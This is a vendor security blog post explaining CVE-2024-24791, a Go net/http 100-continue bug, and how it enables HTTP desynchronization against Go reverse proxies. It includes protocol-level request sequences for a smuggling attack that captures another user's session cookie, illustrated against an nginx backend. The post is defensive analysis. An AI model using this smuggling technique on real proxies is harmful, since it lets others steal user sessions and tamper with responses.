A DoS bug that’s worse than it seems
At Mattermost, we’re heavy users of the Go programming language and its extensive standard library, which is why we also care deeply about the security of the Go ecosystem.
In recent weeks, we’ve taken some time to thoroughly analyze the contents of some of the security advisories published earlier this year by the Go team.
This blog post focuses on one such advisory in particular, CVE-2024-24791, and its practical security impact. Mattermost products are not affected by any part of the issue described here, and no action is required from customers.
Go’s net/http and improper 100-continue handling
The advisory in question, published in July 2024, is described on the golang-announce mailing list as follows:
net/http: denial of service due to improper 100-continue handling
A fix for this issue is available in Go versions 1.22.5 and 1.21.12.
The advisory describes a bug related to the Expect HTTP request header and the 100 Continue response status, or lack thereof. But what is this protocol feature? When would you use it? And how does a bug in it impact your average application?
A brief introduction to HTTP 100 Continue
Consider a server that allows you to upload images to it using HTTP. At the protocol level, the uploading would probably happen using an exchange such as the following:
Client → Server
POST /images HTTP/1.1
Host: images.example.com
Content-Type: image/png
Content-Length: 2132506
.PNG........IHDR. (~2 megabytes of image data)
Client ← Server
HTTP/1.1 200 OK
With the request, a client announces the type and size of the image being sent and tells the server what to do with it, then starts uploading the raw data. In this case, the image is just over 2 megabytes in size, so several hundred milliseconds will likely pass between the server receiving the headers and the last of the image data arriving. After the upload, the server responds with 200 OK, indicating success.
But what if the server only allows a maximum file size of 2 megabytes? By the time it receives the headers and interprets them, the client might have already sent most of the file! The server can still just ignore what’s being sent and close the connection, but bandwidth is wasted.
This is the problem that the 100 Continue response status solves. Instead of immediately starting to send the file, the client can include an Expect: 100-continue header in the initial request. This signals to the server that the client wants it to confirm it actually can receive what’s about to be sent. When the client then receives a response with the status 100 Continue, it knows the server has seen the provisional metadata and still wants the actual content. A full exchange might look like the following:
Client → Server
POST /images HTTP/1.1
Host: images.example.com
Content-Type: image/png
Content-Length: 2132506
Expect: 100-continue
Client ← Server
HTTP/1.1 100 Continue
Client → Server
.PNG........IHDR. (~2 megabytes of image data)
Client ← Server
HTTP/1.1 200 OK
If the server deems the request too large, instead of 100 Continue, it can respond with an error indicating the reason and close the connection early.
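Go’s standard library supports this mechanism out of the box. The following is a rough client-side sketch; the file name and upload URL are placeholders, and ExpectContinueTimeout controls how long the client waits for the interim response before giving up and sending the body anyway:

package main

import (
	"net/http"
	"os"
	"time"
)

func main() {
	// A client with 100-continue support enabled; if no interim response
	// arrives within the timeout, the body is sent anyway.
	client := &http.Client{
		Transport: &http.Transport{ExpectContinueTimeout: time.Second},
	}

	f, err := os.Open("cat.png") // placeholder image file
	if err != nil {
		panic(err)
	}
	defer f.Close()
	info, err := f.Stat()
	if err != nil {
		panic(err)
	}

	req, err := http.NewRequest(http.MethodPost, "https://images.example.com/images", f)
	if err != nil {
		panic(err)
	}
	req.ContentLength = info.Size() // announce the size up front
	req.Header.Set("Content-Type", "image/png")
	req.Header.Set("Expect", "100-continue") // ask before sending the body

	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
}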
Edge cases with Expect headers
When a server receives an HTTP request with an Expect: 100-continue header, it can behave as described above, but it also has other options: It can simply ignore the header and behave as if it wasn’t present at all, in which case the client should still eventually send the request body. Or it can respond to the request with a final status based on the headers alone, without waiting for the request body, and leave the TCP connection active for additional requests.
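On the server side, Go’s net/http takes care of the protocol details: the interim 100 Continue is only written once a handler starts reading the request body. A size-checking upload handler along the following lines (the route and the 2-megabyte limit are made up for this example) therefore falls into the second category above, answering from the headers alone without ever asking for the body:

package main

import (
	"io"
	"net/http"
)

const maxUpload = 2 << 20 // illustrative 2-megabyte limit

func uploadHandler(w http.ResponseWriter, r *http.Request) {
	// Reject based on the declared size alone. Since r.Body has not been
	// read, no 100 Continue is sent, and a well-behaved client never
	// uploads the file.
	if r.ContentLength > maxUpload {
		http.Error(w, "image too large", http.StatusRequestEntityTooLarge)
		return
	}

	// Reading the body is what triggers the automatic 100 Continue.
	data, err := io.ReadAll(io.LimitReader(r.Body, maxUpload))
	if err != nil {
		http.Error(w, "upload failed", http.StatusBadRequest)
		return
	}
	_ = data // store the image somewhere

	w.WriteHeader(http.StatusOK)
}

func main() {
	http.HandleFunc("/images", uploadHandler)
	http.ListenAndServe(":8080", nil)
}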
The second of these options, responding with a final status without waiting for the request body, is the problematic case in CVE-2024-24791, as can be seen from the advisory. According to it, “mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail.” How does this happen? Let’s look at the corresponding Git commit message:
When receiving a non-1xx response to an "Expect: 100-continue" request, send the request body if the connection isn't being closed after processing the response. In other words, if either the request or response contains a "Connection: close" header, then skip sending the request body (because the connection will not be used for further requests), but otherwise send it.
The HTTP/1.1 client prior to Go 1.22.5 and 1.21.12 assumed that if a server responds to an Expect: 100-continue request with a final status code, it doesn’t need the request body, and the client can just not send it. But while the server might not need the request contents, omitting the body has other consequences: it desynchronizes the connection. In our image example, the server still expects a 2132506-byte file, even if only to discard it, and if the connection is then reused for another request instead of sending the file, the new request gets interpreted as file contents. This is exactly the behavior described in the advisory: the “next request sent on the connection will fail.”
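On the wire, the resulting desynchronization looks roughly like this; the 403 response and the follow-up request are purely illustrative:

Client → Server
POST /images HTTP/1.1
Host: images.example.com
Content-Type: image/png
Content-Length: 2132506
Expect: 100-continue

Client ← Server
HTTP/1.1 403 Forbidden

Client → Server (connection reused, file never sent)
GET /images/latest HTTP/1.1
Host: images.example.com

Client ← Server
(nothing useful: the server reads the GET request as the first bytes of the 2132506-byte file it is still expecting)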
Denial of Service or deeper impact?
The incorrect behavior in net/http affects standalone HTTP/1.1 clients, but it may not be immediately obvious how it could be exploited by an attacker. The advisory goes on to describe one such case within the standard library:
An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
In simpler terms: You have a Go-based frontend proxy server and an arbitrary backend it connects to. (1) An attacker sends an Expect: 100-continue request to the frontend, which forwards the request to the backend. (2) The backend responds with something other than a 100 Continue response, leaving the connection in a bad state. (3) When an unsuspecting user then issues a request to the frontend, the bad connection gets reused, the request misinterpreted, and the user left without a response.
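For concreteness, the frontend in this scenario can be as small as the sketch below; the listen address and backend URL are placeholders. Built with an affected Go release, this is the kind of net/http/httputil.ReverseProxy deployment the advisory is talking about:

package main

import (
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
)

func main() {
	// Placeholder backend address; in the example scenario this would be
	// the nginx server hosting the image service.
	backend, err := url.Parse("http://127.0.0.1:8081")
	if err != nil {
		log.Fatal(err)
	}

	// httputil.ReverseProxy uses the net/http client machinery to talk to
	// the backend, which is why the client-side bug surfaces here.
	proxy := httputil.NewSingleHostReverseProxy(backend)
	log.Fatal(http.ListenAndServe(":8080", proxy))
}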
An attacker capable of “sending Expect: 100-continue requests which elicit a non-informational response from the backend” may sound like a rare occurrence, or even a bug on the backend server’s part, but that’s not the case. Nginx, for example, in its default configuration, responds to unrecognized HTTP request methods with a 405 Not Allowed even when an Expect header is present.
Using the non-standard verb HACK to coerce such a response out of an nginx backend, the full protocol-level attack flow against our image service example becomes something like this (the exact paths and response lines below are illustrative):
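Attacker → Frontend → Backend
HACK /images HTTP/1.1
Host: images.example.com
Content-Type: image/png
Content-Length: 2132506
Expect: 100-continue

Attacker ← Frontend ← Backend
HTTP/1.1 405 Not Allowed
(because of the bug, the frontend never sends the 2132506-byte body; the backend keeps waiting for it, while the frontend considers the connection free for reuse)

User → Frontend → Backend (same backend connection, reused)
GET /images/latest HTTP/1.1
Host: images.example.com

User ← Frontend ← Backend
(no response: the backend reads the GET request as the first bytes of the missing body, and the user’s request eventually times out)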
Why does the connection time out? Because the backend server is expecting a 2132506-byte request body, but only gets a short GET request in its place. It’s left waiting for the rest of the bytes.
The DoS impact is clear, but not particularly dramatic. A client can just retry and get their response the next time. There are certainly worse things that can be done with this type of issue, however.
An attack class: HTTP desynchronization
If you’ve been following web security research in recent years, you may have already guessed it: CVE-2024-24791 is an example of a vulnerability that can be used in HTTP desynchronization attacks. First described by James Kettle in 2019, and building on an older technique called HTTP request smuggling, these attacks have a simple core idea: get a persistent HTTP connection between a frontend proxy and a backend server to go out of sync, and you can then manipulate how the HTTP requests of other users accessing the backend server through the proxy are interpreted.
Turning our DoS into a more sophisticated HTTP desynchronization attack is even simpler: just set the Content-Length value in the original request to something more interesting and line things up nicely.
Below we have another example of an exchange with our image service:
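(As before, the byte counts, paths, and cookie values are illustrative; what matters is how the requests line up.)

(1) Attacker → Frontend → Backend
HACK /images HTTP/1.1
Host: images.example.com
Content-Length: 103
Expect: 100-continue

(2) Attacker ← Frontend ← Backend
HTTP/1.1 405 Not Allowed
(the frontend never sends the 103-byte body; the backend still expects exactly that many bytes)

(3) Attacker → Frontend → Backend (same backend connection, reused)
POST /anything HTTP/1.1
Host: images.example.com
Content-Length: 166

GET / HTTP/1.1
Host: images.example.com

POST /images HTTP/1.1
Host: images.example.com
Cookie: session=attacker
Content-Type: image/png
Content-Length: 1000

(the backend discards the first 103 bytes, the outer POST’s request line and headers, as the body of the HACK request, then parses the smuggled GET and the smuggled POST, whose 1000-byte body has not been sent)

(4) Attacker ← Frontend ← Backend
HTTP/1.1 200 OK
(the response to the smuggled GET; the frontend relays it as the response to the attacker’s second request and considers the connection free again, while the backend waits for the smuggled POST’s body)

(5) User → Frontend → Backend (same backend connection, reused)
POST /images HTTP/1.1
Host: images.example.com
Cookie: session=user
Content-Type: image/png
Content-Length: 2132506

(the backend reads the user’s request line, headers, and cookies as the body of the attacker’s smuggled upload)

(6) User ← Frontend ← Backend
HTTP/1.1 200 OK
(the response to the attacker’s smuggled POST /images, delivered to the user)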
Although the attack is technically simple, there are a lot of moving parts. So let’s go through the example step by step.
(1) The attack starts with the request HACK /images, used to “elicit a non-informational response from the backend.” (2) Desynchronization happens, as the backend responds immediately with a final status and the frontend omits sending any request body.
(3) Next, the attacker starts manipulating the connection state by sending a request whose body consists of two other requests. First in the body is a GET request whose only job is to ensure that (4) the backend responds to this combination of requests and the frontend-backend connection remains alive. Second is a POST request with a sufficiently large Content-Length header value, but no request body. This is a request to upload an image using the attacker’s credentials.
After (3) and (4), the connection is left in a state where the backend expects a body for a POST request, but the frontend expects a new request. (5) When an unsuspecting user then issues a new POST request to the frontend, the frontend-backend connection previously manipulated by the attacker is reused and the backend interprets the request headers as part of the attacker’s request body. The user’s session cookies are uploaded as the attacker’s image file contents, and, finally, (6) the user sees a response intended for the attacker.
This specific attack allows stealing session cookies from other users, but other variants may have a wide range of impacts, from stealing other types of secrets to injecting malicious responses and, indeed, denial of service.
Takeaways for defenders
Writing good security advisories is hard, and the Go security team does an exceptionally good job at it. Still, some issues are more complex than they seem on the surface, and even the experts writing the advisories may not be aware of the full impact of every issue — and how would they be? Understanding impact requires understanding use cases, and something like Go’s standard library has such a wide range of uses that it would be impossible to account for all of them.
Mistakes also happen. In the case of CVE-2024-24791, the proxy implementation within Go’s own standard library is impacted in a way far worse than what’s described in the advisory. The same fix still addresses the incorrect behavior, though, so as a downstream user you are fine as long as you apply all security fixes as they come, regardless of what the advisory says.
This, however, is where the key takeaway lies: incorrect behavior in software is always dangerous, even if all the specific ways of exploiting it haven’t been identified. Keeping up with security patches, and indeed all bug fixes, is critical when dealing with complex software.
To keep up with security updates in Mattermost products, sign up for the Security Bulletin. For more information on Mattermost’s security program, visit the Mattermost Trust Center.